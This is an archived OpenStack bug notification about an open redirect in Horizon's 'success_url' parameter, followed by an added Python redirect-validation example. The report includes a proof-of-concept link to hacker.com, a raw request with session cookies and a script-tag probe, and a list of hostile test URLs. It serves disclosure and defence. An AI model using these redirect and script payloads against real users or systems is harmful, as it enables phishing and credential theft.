
yahoo-eng-team team mailing list archive

[Bug 1982676] Re: Open redirect / phishing attack via "success_url" parameter in OpenStack


Given this bug report is over 2 years old and took a year in public just
to get into stable point releases, it doesn't seem to rise to the level
of urgency where we'd issue an OSSA. As such, I'm closing the Security
Advisory task as Won't Fix, but if there are any dissenting opinions I'm
happy to reopen and revisit that decision.

** Changed in: ossa
       Status: Incomplete => Won't Fix

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1982676

Title:
  Open redirect / phishing attack via "success_url" parameter in
  OpenStack

Status in OpenStack Dashboard (Horizon):
  Fix Released
Status in OpenStack Security Advisory:
  Won't Fix

Bug description:
  The "success_url" param is used when updating the project snapshot, and
  it lacks sanitization of the input URL, which allows an attacker to
  redirect the user to another website.

  For instance, the URL below will redirect you to https://hacker.com:

  https://xxx.com/project/snapshots/a54c1d97-d354-4171-9602-52fdf0949e83/update/?success_url=https://hacker.com

  The attacker can send this link to the user, and when they click on the
  "Update" button the request and response will look like this:

  [+] Request

  POST /project/snapshots/a54c1d97-d354-4171-9602-52fdf0949e83/update/?success_url=https%3A%2F%2Fhacker.coom HTTP/1.1
  Host: xxx.com
  Cookie: _ga_0CPB5J3KQB=GS1.1.1656302247.2.0.1656302247.0; _ga=GA1.1.2043123211.1656300031; login_region=default; login_domain=""; theme=default; sessionid=yl7fjfh7dhpwduodbxb4mjxng46qowgh; csrftoken=j5WQq7woP7OJGKnbTAa6cbQ8zyEgUhWjIZRu4vDMNgbFbNIl5bAe7V2PESYSbUYI; recent_project=dfcf9f80229f400a9e7ac53782be9e39
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  <====================>SNIP<====================>

  csrfmiddlewaretoken=9wp8nOC21UvAGFxqG0qa1DjRsdKg26P0yqkM1cJqZ3SwbISASBQiWnvyxx4SjJRp&name=snapshot+for+%3Cscript%3Ealert%281%29%3C%2Fscript%3E+%22+%27%5Cu0022%C3%A2%5Cx04&description=

  [+] Response

  HTTP/1.1 302 Found
  date: Tue, 12 Jul 2022 10:14:38 GMT
  server: Apache/2.4.41 (Ubuntu)
  location: https://hacker.com
  content-length: 0
  x-horizon-location: https://hacker.com
  x-frame-options: SAMEORIGIN
  vary: Accept-Language,Cookie
  content-language: en
  <====================>SNIP<====================>

  Impact: The attacker can trick users into being redirected to the cloned
  website to steal information, a so-called phishing attack.

  CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
  http://cwe.mitre.org/data/definitions/601.html

  I have tested it on OpenStack Xena, so the Horizon dashboard could be between versions 20.0.0 and 20.1.2. I haven't tested the bug on other versions.
  Unfortunately, I discovered this bug while pen-testing a black-box project, so I do not have the log file. I hope my information helps you to understand the bug.

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1982676/+subscriptions
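The fix for the class of bug described in the report above is to validate the "success_url" value against the dashboard's own host before issuing the 302. The following is an added example, not Horizon's code; it reimplements the checks that Django's django.utils.http.url_has_allowed_host_and_scheme performs, without a Django dependency, and assumes a dashboard host of xxx.com (taken from the report) and a constructed fallback page.

```python
"""Added example: validating a ``success_url`` redirect target before use.

The checks mirror the pattern of Django's url_has_allowed_host_and_scheme;
this is an illustration written for this bug, not Horizon's own code.
"""
import unicodedata
from urllib.parse import urlsplit

# Constructed values: the dashboard host from the report and a safe fallback page.
DASHBOARD_HOSTS = {"xxx.com"}
FALLBACK_URL = "/project/snapshots/"


def _is_safe(url, allowed_hosts, require_https):
    if not url or url.startswith("///"):        # browsers treat 3+ slashes as absolute
        return False
    if unicodedata.category(url[0])[0] == "C":  # leading control char can hide a scheme
        return False
    try:
        parts = urlsplit(url)
    except ValueError:                          # e.g. malformed IPv6 literal
        return False
    if parts.scheme and not parts.netloc:       # javascript:..., http:///evil
        return False
    scheme = parts.scheme or ("http" if parts.netloc else "")
    valid = {"https"} if require_https else {"http", "https"}
    # Compare the full netloc, so "xxx.com@hacker.com" does not pass as xxx.com.
    host_ok = not parts.netloc or parts.netloc in allowed_hosts
    return host_ok and (not scheme or scheme in valid)


def is_safe_redirect(url, allowed_hosts=DASHBOARD_HOSTS, require_https=True):
    """True only for same-site absolute URLs or local paths; blocks open redirects."""
    # Browsers read '\' as '/', so the URL must pass in both spellings.
    return _is_safe(url, allowed_hosts, require_https) and _is_safe(
        url.replace("\\", "/"), allowed_hosts, require_https)


def resolve_success_url(param, fallback=FALLBACK_URL):
    """Return the caller-supplied target if safe, otherwise the fixed fallback page."""
    return param if param and is_safe_redirect(param) else fallback


if __name__ == "__main__":
    for u in ("https://hacker.com", "//hacker.com", "/\\hacker.com",
              "javascript:alert(1)", "https://xxx.com@hacker.com/",
              "/project/snapshots/", "https://xxx.com/project/volumes/"):
        print(f"{u!r:40} -> {resolve_success_url(u)}")
```

The external target from the report is replaced by the fallback page, while in-dashboard paths and same-host HTTPS URLs pass unchanged.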